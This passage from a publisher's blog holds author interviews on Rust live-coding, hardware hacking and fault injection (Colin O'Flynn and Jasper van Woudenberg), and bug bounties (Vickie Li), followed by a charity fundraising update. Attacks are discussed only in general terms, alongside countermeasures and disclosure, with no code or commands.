NSP: One of the goals listed on the Rust 2018 roadmap was to develop teaching resources for intermediate Rustaceans, which I believe is what spurred you to start streaming your live-coding sessions on YouTube. Developers have really embraced them as a way of learning how to use Rust “for real.” Why is it useful, in your view, for newcomers to see an experienced Rust programmer go through the whole development process and see real systems implemented in real time?

JG: Learning a language on your own is a daunting task that requires self-motivation and perseverance. You need to find a problem you’re interested in solving; you need to find the will to get through the initial learning curve where you’ll get stuck more often than you’ll make meaningful progress; and you have to accept the inevitable rabbit holes that you’ll go down when it turns out things don’t work the way you thought they did. That’s not an insurmountable challenge, and some people really enjoy the journey, but it is also time-consuming, humbling and, at times, quite frustrating. Especially because it can feel like you’re infinitely far from what you really wanted to build.

Watching experienced developers build something, especially if you’re watching live and can ask questions, provides a shortcut of sorts. You get to be directly exposed to good development and debugging processes; you get exposure to language mechanisms and tools that you may otherwise not have found for a while on your own; and you spend less time stuck searching for answers, since the experienced developer can probably explain why something doesn’t work shortly after discovering the problem. Of course, it’s not a complete replacement. You don’t get as much of a say in what problem is being worked on, which means you may not be as invested in it, and you won’t get the same exposure to teaching resources that you may later need as you’re trying to work things out on your own. Ultimately, I think of it as a worthwhile “experience booster” to supplement a healthy and steady diet of writing code yourself.
 

NSP: The popularity of your videos notwithstanding, you’ve said that part of what inspired you to write the book is that “they’re not for everyone,” and that some people – yourself included – have a different learning style. Given both mediums cover advanced topics (pinning, async, variance, and so on), would you say the book is an alternative to the live coding sessions, or is it designed to complement them? In other words, would a developer who’s watched your videos still benefit from the book (and vice versa)?

JG: It’s a bit of a mix. The "Crust of Rust" videos cover topics that are covered in the book, and the book covers topics in my videos, but often in fairly different ways. I think it’s likely that consuming both still leads to a deeper understanding than consuming either in isolation. But I also think that consuming either of them should be enough to at least give you the working knowledge you need to start playing with a given Rust feature yourself.

For readers of the book, I would actually recommend watching one of the longer live-coding streams on my channel (over the Crust videos), because they cover a lot of ground that’s hard to capture in a book. Topics like how to think about an error message, or how to navigate Rust documentation work best when demonstrated in practice. And who knows – you may even find the problem area interesting enough that you watch the whole thing to the end!

And with that… std::process::exit
 

Break It Till You Make It: Q&A with Hardware Hackers Colin O'Flynn and Jasper van Woudenberg


To kick off the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series, we're joined by Colin O’Flynn and Jasper van Woudenberg, co-authors of The Hardware Hacking Handbook (available November, 2021). In the following Q&A, we talk with Colin (@colinoflynn) and Jasper (@jzvw) about the perils of proprietary protocols being replaced with network devices, the problem of having too many interesting targets to test your tools on, the beauty of AI-designed attack systems, the indisputable power of “hammock hacking,” and why nobody cares about fault injection until they get hacked with fault injection.

Hardware Hacking Handbook Cover Colin Oflynn Jasper VanWoudenberg

Colin runs NewAE Technology, Inc., a startup based on his ChipWhisperer project that designs tools to make hardware attacks more accessible, and teaches engineers about embedded security – a topic he frequently speaks about at conferences and on tech podcasts.

Jasper is CTO of Riscure North America, where he leads the company’s pentesting teams, and has a special interest in integrating AI with security. His research has been published in various academic journals, and he’s a regular speaker at educational and hacking conferences.

No Starch Press: I’ll start by saying that your book is timely! Hardware hacking, once a niche field of the exploit world, has become far more relevant amidst the proliferation of embedded devices all around us. What do you think accounts for this, and why are side-channel attacks in particular becoming increasingly common (and difficult to prevent)?

Colin O'Flynn: Hardware hacking has been a niche field, but one with an extensive and long history. Most of the powerful attacks we’re discussing today have been demonstrated for 20 years, so I’d say they should be “well-known.” But the truth seems to be that, until recently, advanced hardware attacks weren’t needed for most IoT devices. Default passwords and unlocked debug interfaces were the norm, so most hardware hackers never needed to dig deeper. Many people I’ve talked to at events have told me they were interested in side-channel and similar advanced attacks but never had time to actually learn them, as they were always able to break devices with easier and faster attacks!

The good news is that device manufacturers seem to be taking security more seriously these days, which means side-channel attacks have become a real threat. So I guess we’re seeing the industry fast-forwarding that 20-year lag of security research to catch up.

Jasper van Woudenberg: Hacking always moves with interesting targets. Once pinball machines started requiring money to play, people “hacked” them by just tilting the whole machine. Nowadays physical pinball machines have a tilt sensor – if you tilt the machine in order to affect the ball, it ceases operation. Of course, we’re talking about digital hardware in our book, but bypassing security systems is as old as security systems. So, the abundance of digital devices naturally increases the amount of hacking going on. Side-channel attacks are fascinating if you’re into the intersection between electronics, signal processing and cryptography. Beyond being fascinating though, they only become relevant when more straightforward attacks are mitigated.

NSP: Fault injection (FI) attacks – which inject a glitch into a target device that alters its behavior so you can bypass security mechanisms – used to be too “high end” for most hackers to bother with, often requiring expensive tools and intimate technical knowledge of the specific system under attack. But those days are over. Not only are low-cost FI toolkits readily available, the explosion of IoT has led to the rise of new defensive features, like Secure Boot, that can be easily subverted by a well-timed FI attack. What are the potential risks to a larger IoT network once a device is compromised this way?

CO: In the past we’ve seen end devices used as a pivot point into a more sensitive network. When it comes to commercial devices, we’re seeing many proprietary protocols replaced with network devices. For example, recent access-control readers are now simply PoE devices that talk back to a central server. With many of these devices, the original designers haven’t considered what happens if an end node becomes compromised. While the network may be correctly secured, you still see sensitive credentials stored in end devices become accessible to an attacker. And if an attacker is able to access these credentials, it means they may be able to pivot off the external network and into more sensitive internal networks.

JVW: I think the cost of the tools is a common misunderstanding – they can be really inexpensive. In our lab, we’ve done attacks literally by soldering a single wire to a bus, connecting it to a button, and when we pressed the button at the right time, the system boots our own code. The cost usually comes from the many days and weeks spent trying to figure out how to carry out the attack. And yes, some attacks do require high-end equipment, or at least equipment that can bring down the time used to figure out the attack.

One common stepping-stone attack we see is the firmware dump. Typically, embedded-device firmware does not receive a lot of scrutiny, and may have lingering vulnerabilities that can be exploited. This usually means gaining control over a single device, but there have been wormable firmware issues in the past.

NSP: What measures can be taken to harden embedded systems against FI attacks, and do you see this happening throughout the industry (why or why not)?

JVW: We always advise our customers to threat model and see if it makes sense to consider FI in scope. Usually that’s the case for embedded systems that are out in the field and have some sensitive assets to protect. Next is the question of whether faults can be mitigated in hardware and/or software. Both is ideal, but that’s not always feasible. Our book contains a chapter on countermeasures that also has a lab, so people can try out some ideas for FI countermeasures. Finally, verification of countermeasures early and often is critical. It’s virtually impossible, as a human, to predict all the ways a system can fault. Pre-silicon fault simulation and post-silicon fault injection, without exception, turn up surprises. Iteration and adaptation are key.

And then the million-dollar question: why is the hardening not happening throughout the industry? It’s a combination of cost and human nature. There is a real engineering cost to these countermeasures, so typically we only see customers that have had their devices compromised requiring FI resistance. If a compromise hasn’t happened, it’s very easy to write the attacks off as unrealistic or irrelevant. Nobody cares about fault injection until they get hacked with fault injection.

CO: Fault injection can be tricky to prevent, as we see countermeasures applied that aren’t effective. For instance, Jasper and I demonstrate a few examples in the book where compilers might remove the effect of your clever countermeasures. There seems to be a lot more interest in this now – for many companies, they just need some “end customer” to ask about it. I talked to silicon vendors a few years ago who were tracking countermeasure ideas, but basically none of their customers (people who actually build products) cared about FI attacks. So that meant they weren’t going to pay for engineering efforts to add those countermeasures. We seem to be seeing a very fast shift in the last couple of years though, so people who were tracking this early-on are in a good position to quickly offer solutions.

NSP: Speaking of low-cost fault-injection toolkits, Colin, you developed one of the most popular models out there, the ChipWhisperer, and built a company around it (NewAE Technology). Given that just about everything we use in our homes and offices has embedded computing systems and could be vulnerable to attack, how do you pick which devices to test your boards and analysis algorithms on? An example from your book would be smart toothbrushes – are you ever doing something like brushing your teeth when it suddenly occurs to you, “Wow, I could totally hack this thing”?

CO: This is actually a big problem! Unfortunately I tend to buy a lot of devices (microcontrollers, IoT products, industrial control systems, etc.) because I think they will be interesting to poke at! As a result, I’ve got a storage cabinet full of various devices along these lines… I’m slowly working through some of them, and when we get some time at the company, we’ll pick away at one or two of those devices as well.

But as more devices include embedded security, there are more “interesting" targets than there is hope of having time to deal with them. Part of why we design many different target-board devices (our “UFO targets” for ChipWhisperer) is actually to help out other researchers by giving them an easier platform to work with.

NSP: Once you successfully exploit a commonly used product, do you let the manufacturer know or is that generally considered an exercise in futility?

CO: If I plan on talking about the issue publicly I’ll reach out, even if I don’t think it’s a serious issue. Sometimes it takes a bit of time to reach the correct person (or team), but so far they have all generally spun it into positive experiences all around.

With one ongoing disclosure, for example, the engineering team had internally flagged that there could be some issues related to a relatively unsecure microcontroller that they were using in a product, and my report had validated their internal concerns. In this case they were already working on a new design, but I’m sure my report was a nice bonus for the people involved, as they can point to that as proof that the issue would be found eventually “in the wild.” In the meantime it gave them the opportunity to provide an interim fix via a firmware update for existing customers.

NSP: Jasper, one of your specialized areas of interest is combining AI with security research. Would you explain what this entails? And looking into the future, how could AI applications be leveraged to improve hardware and embedded security at the design level?

JVW: What I love about AI is also what I love about hacking: making a computer device do more than the original designer put in. With AI, this is tying a couple of artificial neurons together and getting a cat-and-dog image detector. With hacking, this is sending some weird input into a program and all of a sudden it executes arbitrary code.

The combination, I find fascinating. For instance, we’ve used neural networks to do side-channel analysis and outperform human-designed algorithms. We created an algorithm with colleagues that automatically optimizes fault injection parameters. I’ll work very hard to create some automation so I can be – paradoxically – lazy afterwards.

I firmly believe that most if not all cognitive activities, such as designing or attacking systems, will be better performed using AI rather than brains – the big question is when. I prefer to be on the side of making systems more secure through AI, so my research is going towards automating both the detection and mitigation of vulnerabilities, at scale. For instance, a big push we have currently is in pre-silicon security – detecting side-channel and fault issues before they make it into products. I wouldn’t say we’ve arrived at using AI yet, but the first steps are being made.

NSP: Both of you have advanced degrees, which makes sense given all of the academic knowledge involved with embedded security. Yet, The Hardware Hacking Handbook makes very little assumption about a reader’s background. What was your approach to making this challenging field accessible to novices and newcomers, and why was it important enough that you wrote an entire book on this premise?

CO: My career path on paper seems relatively full of academic love – I was an assistant professor for several years in the Electrical & Computer Engineering department at Dalhousie University. But back at the start, when I was considering applying to start my undergraduate degree in electrical engineering, I came relatively close to not attending university at all. I had self-taught myself a fair amount about electronics in high school, and managed to get a summer job that was effectively an electrical engineering internship, and was considering just continuing to grow with the “on the job” experience instead. In the end I fell onto the academic path, but I’ve always believed that it is not the only path, and part of this shapes my desire to make this as accessible as possible.

While many readers may be undergraduate or grad students, it’s clear that a classic academic textbook would cut out readers coming from other backgrounds (including everyone from high school students to professionals interested in looking at other careers). Practically, what we write down isn’t the only consideration – one of the great things about working with No Starch Press is that the pricing of the books makes them more accessible as well. From academic publishers, this book would have been $150+. And there would never be Humble Bumble sales that make it completely accessible on the level that NSP does!

JVW: I’ve taught courses on side-channel and fault injection for years, and it has taught me that the group of people that has to defend against these attacks is not necessarily interested in all the theory and all the research in this field. They want to focus on their goals of creating a system.

Then there’s the group of people like teenage me. I started hacking software before I had an internet connection, so I know the struggle of having to figure out everything by yourself. Looking around at the amazing blogs, videos, tutorials, etc. that exist for the software space currently, it really made me realize what a gap there is in the hardware space.

So, for both these groups, it’s really about breaking things down into practical tips and tricks, and then some of the unavoidable theoretical background. I really would like to show people that this space isn’t daunting, and that even someone like me – who came off a software background – can learn and enjoy it.

NSP: I’ll end with an easy one (I think) – what is your favorite hacking tool, and has that changed since you first got interested in hardware hacking when you were young?

CO: I should probably say my favourite tool is one of my own more-advanced products. But really, a good DMM is the most important tool! And in that regard, it hasn’t changed much over the years – one of my first “dream gifts” (back when Santa would be responsible for it) was a Fluke 12 multimeter, long before I knew about hardware hacking. I’ve since upgraded to a nicer meter (Fluke 179/EDA2 kit), but as we talk about in the book, there is so much you can do with this tool! Finding where pins go, checking the state of logic levels and voltages – it’s still my most used tool when I’m looking at a new device.

JVW: I started being “creative with technology” in the mid-’90s. What has changed is the amount of information available, and the fact that security is now an actual career – I still don’t always believe people are willing to pay me to do this. What hasn’t changed is my curiosity, and the rush that comes with solving a complex problem.

Favorite hacking tool? Hah. Although I use devices for a significant portion of the day, they are also a source of frustration. So, those are out. I’m going to say: my hammock. When I get stuck on a problem and I sense no more new ideas are being produced, or I get frustrated, I drop the problem for a few hours or days. Then I hop in my hammock for what I call “hammock hacking.” This is where I hang back and relax. I’ll almost always have a new view on the problem, or another way of connecting some dots that I hadn’t considered before. Or I fall asleep. But it’s a win in either case.

InfoSec Warrior Vickie Li: From Hunting Bugs to Helping Developers

Vickie Li is the resident developer evangelist at the application security firm ShiftLeft, and a self-described “professional investigator of nerdy stuff.” Her new book, Bug Bounty Bootcamp, leverages her expertise in offensive web security as well as her background in vulnerability research to introduce beginners to all aspects of web hacking, showing readers how to find, exploit, and report bugs through “bounty” programs. In her free time, when she’s not podcasting, speaking at conferences, or dropping infosec and cybersecurity knowledge on YouTube, she’s writing articles and blog posts about nipping security problems in the bug.

Bug Bounty Bootcamp Cover Vickie Li

For the September edition of our ongoing Author Spotlight series, we talk with Vickie about her first bug bounty payout, how her success hacking apps made her a passionate advocate for secure development, and why she means it quite literally when she tells you that becoming a good web hacker is like learning to ride a unicycle.

No Starch Press: First of all, that’s a pretty impressive intro for someone in their mid-twenties! But let’s go back a few years. You graduated with a CS degree from Northwestern, then worked as a freelance web developer before getting into infosec, pentesting, and offensive-security content creation, which – correct me if I’m wrong – led to your current full-time gig as a developer evangelist. So where did your foray into bug hunting come into play, and how did you get started with bounty programs?

Vickie Li: I got interested in security through my university courses, and started bug bounties as a way to learn more about infosec. Hacking on bug bounty programs helped me learn a lot about web hacking and web application security in general. But sitting in front of my laptop all day, I started to lose motivation because I really wanted my work to connect me with other people, and doing bug bounties all alone was quite lonely. That’s why I started my technical blog, where I wrote about whatever I was learning at the moment. I really tried to make the blog posts easy to understand, because I hoped people who were studying the same thing would find it helpful.

My blog actually kickstarted my career in infosec. Because of it, I was able to get some freelance penetration testing and technical writing jobs, and eventually landed my current job at ShiftLeft. Knowing how to explain complex technical concepts also helped me with writing Bug Bounty Bootcamp and making it an approachable web-hacking book.

NSP: What was your first real catch, and what was it like earning your first paid bounty?

VL: I found my first paid bug – a CSRF – about a week into hunting for bugs. The bounty was just a hundred dollars, but it was amazing to be able to earn a bit of money as I learned about the field. The most memorable part about the experience was when [the company’s] security team triaged the bug I found, and fixed it on the website. It was very motivating to know that I can contribute to the security of a widely used site through my work!

NSP: Over the past year you’ve gone from working as a freelancer/bug hunter to a full-time gig as a “developer evangelist” – a job focused on bridging communications between external dev teams and your internal app-security colleagues. Can you elaborate on what exactly your day-to-day is like, and how it satisfies your infosec interests?

VL: My primary role at ShiftLeft involves making secure coding practices approachable for developers, and spreading the word about how static analysis can help in this process. Every day is different: I might be writing a blog post, preparing to speak at a conference, or helping my team understand the needs of developers during the security process. I really enjoy the work because it fits into my original motivation for getting into infosec: helping make the internet a safer place for everyone.

NSP: The name of your company refers to shifting security to the left – or, introducing security checks earlier in the development life cycle rather than at the end. You underscored this in a blog post, comparing app security to wearing a facemask during the pandemic (“Building a Security-First Culture”). At the same time, your book is about hunting for zero-day vulnerabilities and getting started in bounty programs. Do you ever worry that if you’re too good at your job there won’t be any more bugs to hunt?

VL: I am not worried about that. Shifting left and bug bounties are not an either-or situation. These practices work together to help organizations become more secure. Bug bounty hunters are creative and are constantly coming up with new ways to attack an application. Organizations can use bug bounty programs to tackle new and inventive attack vectors before malicious attackers discover them. But most bugs should still be discovered early in the development cycle, when they are the easiest to fix. Shifting left will help eliminate most security vulnerabilities in your applications, and bug bounties can help you catch the rest.

NSP: To take this question in the opposite direction, has your bug-hunting experience helped or informed your current work advocating for better security practices?

VL: During my time as a bug bounty hunter, I helped lots of developer teams fix security issues in their applications. That’s when I noticed that many serious security vulnerabilities stem from small programming mistakes that could be easily discovered with static analysis. It’s easier to find and fix vulnerabilities early in the development process because you do not risk an attacker exploiting it in production.

This experience made me a really passionate advocate for secure development and security education. Offensive security practices like penetration testing or bug bounties are a great way to secure your applications, but they should only be used as a fail-safe to catch novel bug classes and vulnerabilities that slip past security protocols during the development cycle.

NSP: The AppSec space, and the cybersecurity industry as a whole, lives in a constant state of change, with new types of exploits emerging every day. How do you keep up with the ever-evolving landscape?

VL: I’m known to be quiet on social media, but I actually use Twitter a lot – mostly to get informed on the latest security news and understand the security challenges people are currently facing. In other words, I am the classic Twitter lurker. I also read a lot of infosec books, and follow a few well-written security blogs and YouTube channels.

NSP: Are there any online resources (besides your own) that you can recommend to aspiring web hackers, bug hunters, or security researchers?

VL: I am a big fan of reading security books to gain in-depth knowledge about a topic, and then reading blog posts for the latest infosec techniques – Orange Tsai’s blog is one of my favorites. He is a really creative hacker and has been a big inspiration for me ever since I started. Also, Web Security Academy by PortSwigger is a great starting point for web hackers who want to get some hands-on experience.

NSP: Okay, I’ve saved the most pressing question for last. You recently posted on Twitter that you were having a hard time selling your unicycle. This implies that 1) you own a unicycle, and 2) that you know how to ride a unicycle. Do tell.

VL: Happy to announce that I have sold my unicycle to a new loving owner! I learned to unicycle in college because I’ve always thought it’s cool to have an uncommon skill like unicycling. Unicycling is really hard to learn! It took me countless falls and months of practice to finally learn to ride it in a straight line.

But, this experience really boosted my confidence in learning. Like web hacking, learning to unicycle is hard but possible if you put your mind to it and persist. Now when I am trying to learn something difficult, I know I can ‘cause hey – I learned to unicycle! 10/10 would recommend unicycling as a sport. There are few things in this world cooler than a unicycling hacker.

With Your Help, We Raised Over $2.75M for Charity!

 

We’ve been partnering with our authors and Humble Bundle on special pay-what-you-want ebook deals since 2015—that’s 30 bundles to date, for those keeping score at home. As anyone who’s taken advantage of these promotions knows, the PWYW model means that you choose between various pricing tiers of titles, then decide how much of your purchase goes to charity.

This is all to say: THANK YOU. We’re fortunate to have such a generous customer base, because over the last eight years we’ve raised more than $2.75 million for two-dozen non-profits, as well as the Hacker Alliance—a 501(c)(3) created by publisher Bill Pollock to support hacker communities around the world.

From promoting digital rights and fighting censorship, to helping marginalized populations learn to code, to supporting education through the United Negro College Fund and Teach for America, we’ve done a lot of good together.

Here’s the full list of nonprofits that your charitable donations have gone towards:

  • Electronic Frontier Foundation
  • The No Starch Press Foundation 
  • Python Software Foundation 
  • Choose-Your-Own-Charity 
  • National Coalition Against Censorship 
  • Freedom of the Press Foundation 
  • Code.org 
  • Internet Security Research Group
  • Freedom to Read Foundation 
  • Book Industry Charitable Foundation
  • Girls Who Code 
  • Comic Book Legal Defense Fund
  • Covenanthouse 
  • United Negro College Fund
  • Teach For America
  • Code-to-Learn Foundation 
  • Women Who Code, Inc. 
  • Extra Life 
  • Active Minds, Inc. 
  • Every Child a Reader
  • St. Jude Children's Research Hospital 
  • Call of Duty Endowment 
  • The Red Nose Day Fund / Comic Relief, Inc.
  • It Gets Better Project 

 

 

About Humble Bundle 

Humble Bundle sells digital content through its pay-what-you-want bundle promotions and the Humble Store. When purchasing a bundle, customers choose how much they want to pay and decide where their money goes—between the content creators, charity, and Humble Bundle. Since the company's launch in 2010, Humble Bundle has raised more than $140 million through the support of its community for a wide range of charities, providing aid for people across the world. For more information, visit https://www.humblebundle.com/charities